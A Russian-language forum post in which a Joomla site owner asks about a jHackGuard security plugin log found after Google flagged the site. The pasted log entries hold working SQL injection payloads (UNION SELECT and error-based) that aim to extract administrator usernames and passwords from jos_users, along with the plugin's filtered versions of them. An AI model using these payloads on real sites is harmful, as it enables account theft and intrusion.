Добрый день! Google объявил сайт с угрозой. Начал проверять разными сканерами и один из них нашел такой вот jhackguard-log.php в папке /log/
Я не пойму толи сам плагин jhackguard что то не то делает, то ли он в лог писал??
2013-12-26T06:46:45+00:00 CRITICAL jhackguard Changed GET value from: %' and 1=2) union select 1,group_concat(0x3C6B65793E,username,0x3a,password,0x3a,usertype,0x3a,0x3C62723E,0x3C6B6579733E),3,4,5,6,7,8,9,10,11,12,13,14,15,16 from jos_users where usertype='Super Administrator' or usertype='Administrator' -- ; to: %' and 1=2) union select 1,group_(0x3C6B65793E,username,0x3a,password,0x3a,usertype,0x3a,0x3C62723E,0x3C6B6579733E),3,4,5,6,7,8,9,10,11,12,13,14,15,16 from where usertype='Super ' usertype='Administrator' -- ;
2013-12-26T19:17:06+00:00 CRITICAL jhackguard Changed GET value from: %' and 1=2) union select 1,group_concat(0x3C6B65793E,username,0x3a,password,0x3a,usertype,0x3a,0x3C62723E,0x3C6B6579733E),3,4,5,6,7,8,9,10,11,12,13,14,15,16 from jos_users where usertype='Super Administrator' or usertype='Administrator' -- ; to: %' and 1=2) union select 1,group_(0x3C6B65793E,username,0x3a,password,0x3a,usertype,0x3a,0x3C62723E,0x3C6B6579733E),3,4,5,6,7,8,9,10,11,12,13,14,15,16 from where usertype='Super ' usertype='Administrator' -- ;
2013-12-28T07:06:25+00:00 CRITICAL jhackguard Changed GET value from: -62 union select 1,2,password,4,5,6,7,8,9,10,11,12,group_concat(0x3C6B65793E,username,0x3a,password,0x3a,usertype,0x3a,block,0x3a,activation,0x3a,0x3C62723E,0x3C6B6579733E),14,15,16,17,18,19,20,21,22,23,24,25,26,27 from jos_users where usertype='Super Administrator' or usertype='Administrator' -- to: -62 union select 1,2,password,4,5,6,7,8,9,10,11,12,group_(0x3C6B65793E,username,0x3a,password,0x3a,usertype,0x3a,block,0x3a,activation,0x3a,0x3C62723E,0x3C6B6579733E),14,15,16,17,18,19,20,21,22,23,24,25,26,27 from where usertype='Super ' usertype='Administrator' --
2014-01-02T22:56:34+00:00 CRITICAL jhackguard Changed GET value from: (select 1 from(select count(*),concat((select username from jos_users where usertype=0x73757065722061646d696e6973747261746f72 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) to: (select 1 from(select count(*),((select username from where usertype=0x73757065722061646d696e6973747261746f72 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
2014-01-15T21:21:00+00:00 CRITICAL jhackguard Changed COOKIE value from:60476600.1389787523.1.1.utmcsr=rambler|utmccn=(organic)|utmcmd=organic|utmctr=линия текст текст текст to:
2014-01-15T21:22:28+00:00 CRITICAL jhackguard Changed COOKIE value from:60476600.1389787523.1.1.utmcsr=rambler|utmccn=(organic)|utmcmd=organic|utmctr=линия текст текст текст to:
2014-01-15T21:27:10+00:00 CRITICAL jhackguard Changed COOKIE value from:60476600.1389787523.1.1.utmcsr=rambler|utmccn=(organic)|utmcmd=organic|utmctr=линия текст текст текст to:
2014-01-15T21:30:00+00:00 CRITICAL jhackguard Changed COOKIE value from:60476600.1389787523.1.1.utmcsr=rambler|utmccn=(organic)|utmcmd=organic|utmctr=линия текст текст текст to:
2014-01-15T21:32:28+00:00 CRITICAL jhackguard Changed COOKIE value from:60476600.1389787523.1.1.utmcsr=rambler|utmccn=(organic)|utmcmd=organic|utmctr=линия текст текст текст to:
14.12.2017, 20:22:52